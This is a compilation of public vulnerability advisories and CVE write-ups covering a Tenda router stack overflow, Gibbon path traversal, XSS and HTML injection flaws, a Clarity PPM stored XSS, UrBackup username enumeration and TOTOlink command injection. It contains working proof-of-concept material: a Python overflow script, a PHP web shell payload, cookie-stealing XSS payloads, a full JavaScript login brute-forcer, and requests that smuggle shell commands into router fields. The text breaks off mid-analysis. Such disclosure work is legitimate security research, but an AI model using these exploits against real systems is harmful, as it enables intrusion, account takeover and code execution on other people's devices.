Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName.

**stack buffer overflow in tdhttpd in Tenda AX1803 1.0.0.1\_2994 and earlier allows remote authenticated users to remote code excution via SetOnlineDevName request****Overview**

**type**: Buffer Overflow vulnerability

**Manufacturer** : Tenda( (https://www.tenda.com.cn/)

**Product**: WiFi router ax1803

**Firmware download address** ： https://www.tenda.com.cn/download/detail-3421.html

**Product Information**:Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network!

Overview of the latest version router simulation of Tenda AX1803 v1.0.0.1\_2994  

**Vulnerablity details**

Download the firmware and decompress it, use Binwalk -e to extract filesystem  

The vulnerability lies in rootfs\_In /goform/SetOnlineDevName function of /bin/tdhttpd in ubif file system. attackers can access http://routerip/goform/SetOnlineDevName , and setting a very long DevName parameter to trigger stack buffer overlow, the stack buffer overflow can be caused to achieve the effect of router remote code excution and can obtain a stable root shell through a carefully constructed payload

Request can be found in this place:  

As we can see devName section in POST request.  

formSetDeviceName function (/bin/tdhttpd) call a function to bond device name with mac information, this function is vulnerable to buffer overflow.  
  
In the "set_name_with_mac" function, devName is copied into v9 array through sprintf function with format arg "%s;1", this means sprintf would copie all the content in devName and there is no length limitation for devName.  
The v9 array is defined in here. The length of array is 256 bytes, if the devName's length longer than v9 would cause buffer overflow

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    #!/usr/bin/env python3
    import requests,sys
    from pwn import *
    
    # replace ip address here
    url = "http://192.168.10.1/goform/SetOnlineDevName"
    payload = 'a' * 0x100
    
    payload = "mac=00:00:00:00:00:01&devName=%s&nodeName=mainNode"%payload
    content_length = len(payload)
    header = {
    "Host":"192.168.10.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"http://192.168.10.1",
    "Content-Length":"%d"%content_length,
    "Connection": "close",
    "Cookie": "password=bcf33de30ebf57e4d3785c08adec4b85cvztgb" # Note to replace the password field in the cookie
    }
    
    r = requests.post(url, headers=header, data=payload)
    
    

**result:**  
As you can see below, PC register is hijacked with payload. By constructing a payload, this can also get a stable root shell

CVE-2022-45781: Tenda AX1803 Buffer Overflow vulnerability . - XFALLEN

GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder. An attacker can create a new Asset Component. The templateFileDestination parameter can be set to an arbitrary pathname (and extension). This allows creation of PHP files outside of the uploads directory, directly in the webroot.

**usd-2023-0022 | Path-Traversal**

**Advisory ID**: usd-2023-0022  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-23  
**Security Risk**: Critical  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45880

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

The application allows high priviliged users to create report templates.  
The report template builder is vulnerable to a Path Traversal vulnerability.

The "uploads" directory is not accessible by default, however it is possible to write files directly in the web root.  
Even the file extension can be manipulated which results in an arbitrary file write vulnerability.

**Proof of Concept**

In the first step, we need to duplicate one of the existing assets. This can be done on the **Home > Reports > Template Builder > Manage Assets** page.

The original request that is triggered is shown below:

POST /modules/Reports/templates\_assets\_components\_duplicateProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="address"

/modules/Reports/templates\_assets\_components\_duplicate.php
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="templateFileDestination"

footers/pageNumber.twig.html
------WebKitFormBoundaryGDOtYymhe5cRMATP--

The **templateFileDestination** parameter shows where the component template will be saved to. The file can be moved to the webroot, to make it accessible. An attacker can even change the file extension to **php**.

POST /modules/Reports/templates\_assets\_components\_duplicateProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="address"

/modules/Reports/templates\_assets\_components\_duplicate.php
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025
------WebKitFormBoundaryGDOtYymhe5cRMATP
Content-Disposition: form-data; name="templateFileDestination"

../../../usd.php
------WebKitFormBoundaryGDOtYymhe5cRMATP--

The file can be created from within the web application. You can insert PHP code and receive remote code execution.

This will result in the following request to be triggered

POST /modules/Reports/templates\_assets\_components\_editProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="address"

/modules/Reports/templates\_assets\_components\_edit.php
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000028
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="name"

Page Number
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="templateFile"

../../../usd.php
------WebKitFormBoundaryfnqLMucCLAXR1frS
Content-Disposition: form-data; name="templateContent"

<?php echo system($\_GET\['cmd'\]);?>
------WebKitFormBoundaryfnqLMucCLAXR1frS--

It should be noted, that the frontend will return an error that the request "failed due to a database error". However, the file is still created and populated with the payload.  
The following screenshot shows, that the file was successfully created and populated with the payload.  

**Fix**

It is recommended to prevent passing user-supplied input to filesystem operations.  
If this is required, escape user input before processing it. Use a whitelist approach to only allow valid input.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/05-Authorization\_Testing/01-Testing\_Directory\_Traversal\_File\_Include

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45880: usd-2023-0022 - usd HeroLab

GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS. The imageAsLinks parameter must be set to Y to return HTML code. The filename attribute of the bodyfile1 parameter is reflected in the response.

**usd-2023-0024 | Cross-Site Scripting**

**Advisory ID**: usd-2023-0024  
**Product**: Gibbon  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: High  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45881

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A reflected XSS was found in the filename of uploaded files.  
This can lead to the creation of arbitrary high privileged accounts.

**Proof of Concept**

The application allows to upload files without prior authentication using the

/modules/Planner/resources\_addQuick\_ajaxProcess.php

endpoint.

The following request can be used to upload files to the server:

POST /modules/Planner/resources\_addQuick\_ajaxProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="id"

body
------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyaddress"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile1"; filename="../<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif"
Content-Type: text/plain

<!DOCTYPE html>
<html><h1>hello</h1>/html>

------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile2"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile3"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="bodyfile4"


------WebKitFormBoundaryeSZWbY4RNteSpbi4
Content-Disposition: form-data; name="imagesAsLinks"

Y
------WebKitFormBoundaryeSZWbY4RNteSpbi4--

The **imagesAsLinks** parameter must be set to **Y** to return HTML code.  
The _filename_ attribute of the **bodyfile1** parameter is reflected in the response.

The response of the request will look like:

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=/; HttpOnly; SameSite=Lax
\[...\]

&lta target='\_blank' style='font-weight: bold' href='http://localhost:8080/uploads/2023/07/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ\_Go0qk7tKRgW0S9X8.gif'>&ltimg src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://cwe.mitre.org/data/definitions/79.html

**Timeline**

*   **2023-07-11**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45881: usd-2023-0024 - usd HeroLab

GibbonEdu Gibbon version 25.0.0 allows HTML Injection via an IFRAME element to the Messager component.

**usd-2023-0019 | HTML Injection**

**Advisory ID**: usd-2023-0019  
**Product**: Gibbon (https://gibbonedu.org/)  
**Affected Version**: 25.0.00  
**Vulnerability Type**: CWE-79  
**Security Risk**: Medium  
**Vendor URL**: https://gibbonedu.org  
**Vendor acknowledged vulnerability**: Yes  
**Vendor Status**: Fixed  
**CVE number**: CVE-2023-45879

**Desciption**

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes  
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

A user with permissions to send messages can inject an **iframe** into the application.  
This can be used to abuse a XSS/CSRF vulnerability in the admin backend, to create a new admin user.

The message can be send to an existing admin user. When the target opens the message, the (hidden) **iframe** will be embedded into the application.

**Proof of Concept**

To create the message, navigate to the _Home > Messenger > New Message_ site.

Fill the form and select an admin user as reciepent. Intercept the request and change the message body to

<iframe src="http://responsible-disclosure:8989/index.html"></iframe>

POST /modules/Messenger/messenger\_postProcess.php HTTP/1.1
Host: localhost:8080
\[...\]

------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="address"


/modules/Messenger/messenger\_post.php
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="subject"

test
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
Content-Disposition: form-data; name="body"

<p><iframe src="http://localhost:8989/index.html"></iframe></p>
------WebKitFormBoundaryHs6JkrrxpoUfeRfX
\[...\]
Content-Disposition: form-data; name="individualList\[\]"

0000000001
------WebKitFormBoundaryHs6JkrrxpoUfeRfX--

As shown in the screenshot below, the iframe is injected into the message.  

**Fix**

It is recommended to treat all input on the website as potentially dangerous.

**References**

*   https://owasp.org/www-project-web-security-testing-guide/latest/4-Web\_Application\_Security\_Testing/11-Client-side\_Testing/03-Testing\_for\_HTML\_Injection

**Timeline**

*   **2023-06-27**: Vulnerability identified by Christian Poeschl
*   **2023-09-19**: Security Release v25.0.01
*   **2023-11-02**: Advisory published

**Credits**

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE-2023-45879: usd-2023-0019 - usd HeroLab

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

==================================================================================================================================  
# Title     : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting   attacks.                                                     |  
# Author    : Kaizen                                                                                                       |  
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64)                                           |  
# Vendor    : https://www.broadcom.com/                                                                                             
# Dork      : https://www.broadcom.com/products/software/value-stream-management/clarity                                      |  
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft  
#CVE Assigned: CVE-2023-37790  
==================================================================================================================================

POC:

Header: Content-Type: text/html; charset=utf-8

Payload: <body onload=alert(document.cookie)>

HTTP Request:  
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1

[REDACTED]

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo"

------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"  
Content-Type: text/html; charset=utf-8

<body onload=alert(document.cookie)>  
------WebKitFormBoundaryr7Mas24AkgGJH4HE  
Content-Disposition: form-data; name="superSecretTokenKey"

superSecretTokenValue  
------WebKitFormBoundaryr7Mas24AkgGJH4HE--

HTTP Response:

HTTP/1.1 200 OK  
content-disposition: inline;filename="payload.png"  
Content-Type: text/html;charset=utf-8  
Content-Length: 90  
Date: Thu, 06 Jul 2023 07:33:24 GMT  
Connection: close  
Server: CA PPM

<body onload=alert(document.cookie)>

To Trigger Stored XSS visit user profile picture.

https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true

CVE-2023-37790: Clarity PPM 14.3.0.298 Cross Site Scripting ≈ Packet Storm

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

Starting with the first step, access the login page at localhost:55414. The login page includes fields for username and password, and it lacks captcha or any other controls to prevent automated form submissions. We observed that this allows perpetrators to brute-force the login request.

Next, we begin to understand how UrBackup works. We first try using the username "root". The result shows that "User does not exist". From this, we can easily deduce that this user does not exist.

We then try using a common username credential that might be used by most administrators, which can be found here. If we are lucky, the admin might be using one of the existing usernames from the wordlist similar to my demonstration, which shows that the username "admin" exists; however, the popup indicates "Wrong password".

The first request is sent to /x?a=salt and the response contains a cryptographic setting

The cryptographic JavaScript function that performs a password calculation is located on the client side.

1\. Prepare a list of existing usernames (in this case "admin")

2\. Prepare a password wordlist (in this case is "pass.txt")

3\. Run below code to automate brute-force

    
    
    import axios from 'axios';
    import fs from 'fs/promises';
    import qs from 'qs';  
    import sjcl from 'sjcl';
    import { HttpProxyAgent } from 'http-proxy-agent';
    
                   const proxyAgent = new HttpProxyAgent('http://127.0.0.1:8080');
    var blks = null;
    var nblk = null;
    var i = null;
    var x = null;
    var a = null;
    var b = null;
    var c = null;
    var d = null;
    var olda = null;
    var oldb = null;
    var oldc = null;
    var oldd = null;
    var str = null;
    var j = null;
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
      str = "";
      for(j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
               hex_chr.charAt((num >> (j * 8)) & 0x0F);
      return str;
    }
    function str2blks_MD5(str)
    {
      nblk = ((str.length + 8) >> 6) + 1;
      blks = new Array(nblk * 16);
      for(i = 0; i < nblk * 16; i++) blks[i] = 0;
      for(i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
      blks[i >> 2] |= 0x80 << ((i % 4) * 8);
      blks[nblk * 16 - 2] = str.length * 8;
      return blks;
    }
    function add(x, y)
    {
      var lsw = (x & 0xFFFF) + (y & 0xFFFF);
      var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
      return (msw << 16) | (lsw & 0xFFFF);
    }
    function rol(num, cnt)
    {
      return (num << cnt) | (num >>> (32 - cnt));
    }
    function cmn(q, a, b, x, s, t)
    {
      return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
      return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
      return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
      return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
      return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }
    function calcMD5(str)
    {
      x = str2blks_MD5(str);
      a =  1732584193;
      b = -271733879;
      c = -1732584194;
      d =  271733878;
      for(i = 0; i < x.length; i += 16)
      {
        olda = a;
        oldb = b;
        oldc = c;
        oldd = d;
        a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
        d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
        c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
        b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
        d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
        c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
        a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
        d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i+10], 17, -42063);
        b = ff(b, c, d, a, x[i+11], 22, -1990404162);
        a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
        d = ff(d, a, b, c, x[i+13], 12, -40341101);
        c = ff(c, d, a, b, x[i+14], 17, -1502002290);
        b = ff(b, c, d, a, x[i+15], 22,  1236535329);    
        a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
        d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
        c = gg(c, d, a, b, x[i+11], 14,  643717713);
        b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
        a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
        d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
        c = gg(c, d, a, b, x[i+15], 14, -660478335);
        b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
        a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
        d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
        c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
        b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
        a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
        d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
        c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
        b = gg(b, c, d, a, x[i+12], 20, -1926607734);
        
        a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
        d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i+11], 16,  1839030562);
        b = hh(b, c, d, a, x[i+14], 23, -35309556);
        a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
        d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
        c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
        b = hh(b, c, d, a, x[i+10], 23, -1094730640);
        a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
        d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
        c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
        b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
        a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
        d = hh(d, a, b, c, x[i+12], 11, -421815835);
        c = hh(c, d, a, b, x[i+15], 16,  530742520);
        b = hh(b, c, d, a, x[i+ 2], 23, -995338651);
        a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
        d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
        c = ii(c, d, a, b, x[i+14], 15, -1416354905);
        b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
        a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
        d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i+10], 15, -1051523);
        b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
        d = ii(d, a, b, c, x[i+15], 10, -30611744);
        c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i+13], 21,  1309151649);
        a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
        d = ii(d, a, b, c, x[i+11], 10, -1120210379);
        c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
        b = ii(b, c, d, a, x[i+ 9], 21, -343485551);
        a = add(a, olda);
        b = add(b, oldb);
        c = add(c, oldc);
        d = add(d, oldd);
      }
      console.log(rhex(a) + rhex(b) + rhex(c) + rhex(d));
      return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }
    
    const main = async () => {
        try {
            const passwords = await fs.readFile('pass.txt', 'utf8');
            const passwordArray = passwords.split('\n').map(pw => pw.trim());
            for (const password of passwordArray) {
                console.log(password)
              
                const url1 = 'http://localhost:55414/x?a=salt';
                const data1 = qs.stringify({
                    username: 'admin',
                    ses: '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                });
                const response1 = await axios.post(url1, data1, {
                    headers: {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                        "X-Requested-With": "XMLHttpRequest",
                        "Origin": "http://localhost:55414",
                        "Referer": "http://localhost:55414"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                console.log(response1.data);
                const { rnd, salt, ses } = response1.data;
                if (!rnd || !salt) {
                    console.log('Failed to retrieve rnd or salt');
                    continue;
                }
    
                let pwmd5 = calcMD5(salt + password);
                if (10000 > 0) {
                    pwmd5 = sjcl.codec.hex.fromBits(sjcl.misc.pbkdf2(sjcl.codec.hex.toBits(pwmd5), salt, 10000));
                }
                pwmd5 = calcMD5(rnd + pwmd5); 
                const url2 = 'http://localhost:55414/x?a=login';
                const data2 = {
                    username: 'admin',
                    password: pwmd5,
                    ses: ses || '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                };
                
                const response2 = await axios.post(url2, qs.stringify(data2), {  
                    headers: {
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
                        "sec-ch-ua": '"Not;A Brand";v="99", "Chromium";v="106"',
                        "X-Requested-With": "XMLHttpRequest",
                        "sec-ch-ua-mobile": "?0",
                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
                        "sec-ch-ua-platform": '"Windows"',
                        "Origin": "http://localhost:55414",
                        "Sec-Fetch-Site": "same-origin",
                        "Sec-Fetch-Mode": "cors",
                        "Sec-Fetch-Dest": "empty",
                        "Referer": "http://localhost:55414/",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                
                console.log(response2.data);
            }
        } catch (error) {
            console.error('An error occurred:', error);
        }
    };
    main();
    
                   
                

All requests made by the automation script.

An incorrect hash password will return a JSON with an error type of 2.

A correct hash password will return attributes of the settings, and the response length will be different.

CVE-2023-47102: Quantiano

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
